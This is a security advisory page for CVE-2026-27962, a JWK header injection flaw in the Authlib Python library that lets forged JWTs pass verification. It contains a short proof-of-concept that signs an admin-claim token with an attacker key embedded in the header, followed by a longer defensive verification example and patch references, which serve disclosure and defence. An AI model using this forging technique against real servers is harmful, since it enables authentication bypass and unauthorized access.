Security Vulnerability Report
CVE-2026-27962 CVSS 9.1 CRITICAL

CVE-2026-27962

Published: 2026-03-16 18:16:07
Last Modified: 2026-03-17 20:46:48

Description

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:* - VULNERABLE
Authlib < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-27962 PoC - Authlib JWK Header Injection

This PoC demonstrates how an attacker can forge arbitrary JWT tokens
that pass signature verification in vulnerable versions of Authlib.
"""
import json

from jwcrypto import jwk
from authlib.jose import jwt

# Generate attacker key pair
key = jwk.JWK.generate(kty='RSA', size=2048)
private_key = key.export_to_pem(private_key=True)
public_key_jwk = json.loads(key.export_public())

# Create malicious payload (attacker wants admin access)
payload = {
    'sub': 'attacker',
    'admin': True,
    'iat': 1700000000,
    'exp': 1700100000
}

# Forge JWT with embedded public key in header
# This is the key exploitation technique
header = {
    'alg': 'RS256',
    'typ': 'JWT',
    'jwk': public_key_jwk  # Embed attacker's public key
}

# Sign with attacker's private key
# In vulnerable version, when key=None is passed to decode,
# the server will use the embedded jwk for verification
forged_token = jwt.encode(header, payload, private_key)

print(f"[+] Forged JWT Token: {forged_token}")
print("[+] Payload contains admin=True, signed with attacker's key")
print("[+] Target server will accept this token if it passes key=None")
print("\n[+] Exploit successful - Authentication bypass achieved")
```
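The defensive counterpart to the PoC is the rule the description implies: the verification key must be supplied by the server and never read from the token, and a header that carries its own key material (jwk, or the pointer variants jku, x5u, x5c) is grounds for rejection. The block below is an added example written for this page; it is not Authlib's code and not part of the PoC. It uses only the Python standard library, so it stands in HS256 for the advisory's RS256 case (the key-source problem is identical for both). `PINNED_HS256_KEY`, `ALLOWED_ALGS`, `KEY_HINT_HEADERS`, `encode_hs256`, `verify_pinned` and `check` are hypothetical names, and every token and key value in it is constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed placeholder: in a real deployment this comes from the server's
# key store or configuration, never from the token being verified.
PINNED_HS256_KEY = b"constructed-placeholder-server-secret"

# Only the algorithm(s) the server actually issues tokens with.
ALLOWED_ALGS = {"HS256"}

# JOSE header members that carry or point at key material. A server that pins
# its own verification key has no legitimate reason to honour any of them.
KEY_HINT_HEADERS = ("jwk", "jku", "x5u", "x5c")


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Restore the padding that JWT strips.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Minimal HS256 JWT encoder, used only to build sample tokens for the demo."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_pinned(token: str, key: bytes = PINNED_HS256_KEY, now=None) -> dict:
    """Verify a JWT against a server-held key and return its claims.

    Raises ValueError for anything that must not be trusted. The key is a
    parameter supplied by the caller (the server), so there is no code path
    that could fall back to key material found inside the token.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("rejected: malformed token")
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except ValueError:
        raise ValueError("rejected: undecodable header")

    # 1. Refuse tokens that try to supply their own key. This is exactly the
    #    surface the advisory describes: a self-signed token whose header
    #    carries the matching public key.
    hints = [name for name in KEY_HINT_HEADERS if name in header]
    if hints:
        raise ValueError(f"rejected: key material in header {hints}")

    # 2. Algorithm allowlist, so neither 'none' nor an unexpected algorithm
    #    can be chosen by whoever minted the token.
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError(f"rejected: algorithm {header.get('alg')!r} not allowed")

    # 3. Signature check under the pinned key, constant-time comparison.
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("rejected: signature does not verify under the pinned key")

    claims = json.loads(b64url_decode(payload_b64))

    # 4. Only once the signature holds do the claims mean anything.
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise ValueError("rejected: token expired")
    return claims


def check(token: str, now=None):
    """Convenience wrapper returning (accepted, claims_or_reason) for logging or tests."""
    try:
        return True, verify_pinned(token, now=now)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed sample tokens: one minted with the server key, one minted with
    # a key the server never saw and carrying that key's public half in 'jwk'.
    legit = encode_hs256({"alg": "HS256", "typ": "JWT"},
                         {"sub": "alice", "exp": 2000000000}, PINNED_HS256_KEY)
    self_keyed = encode_hs256({"alg": "HS256", "typ": "JWT", "jwk": {"kty": "oct", "k": "constructed"}},
                              {"sub": "attacker", "admin": True, "exp": 2000000000}, b"constructed-other-key")
    for name, tok in (("legit", legit), ("self_keyed", self_keyed)):
        print(name, check(tok, now=1700000000))
```

The order of the checks matters: the header inspection and algorithm allowlist run before any cryptography, so a token that tries to nominate its own key is logged and dropped without ever being handed to a verifier. Passing the key positionally, with no `None` default path, is the property Authlib 1.6.9 restores; a reviewer auditing a code base for this CVE should grep for `key=None` (or a missing key argument) at every JWS/JWT decode call site.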

References

https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681 (Patch)
https://github.com/authlib/authlib/releases/tag/v1.6.9 (Product, Release Notes)
https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5 (Exploit, Mitigation, Vendor Advisory)

Weakness: CWE-347
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-27962", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:07.383", "lastModified": "2026-03-17T20:46:48.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9."}, {"lang": "es", "value": "Authlib es una biblioteca de Python que construye servidores OAuth y OpenID Connect. Antes de la versión 1.6.9, una vulnerabilidad de inyección de encabezado JWK en la implementación JWS de authlib permite a un atacante no autenticado falsificar tokens JWT arbitrarios que pasan la verificación de firma. Cuando se pasa key=None a cualquier función de deserialización JWS, la biblioteca extrae y utiliza la clave criptográfica incrustada en el campo de encabezado jwk del JWT controlado por el atacante. Un atacante puede firmar un token con su propia clave privada, incrustar la clave pública correspondiente en el encabezado y hacer que el servidor acepte el token falsificado como criptográficamente válido — eludiendo la autenticación y la autorización por completo. Este problema ha sido parcheado en la versión 1.6.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.9", "matchCriteriaId": "8C677FEC-2094-49D8-ABAB-F740B6F83D38"}]}]}], "references": [{"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```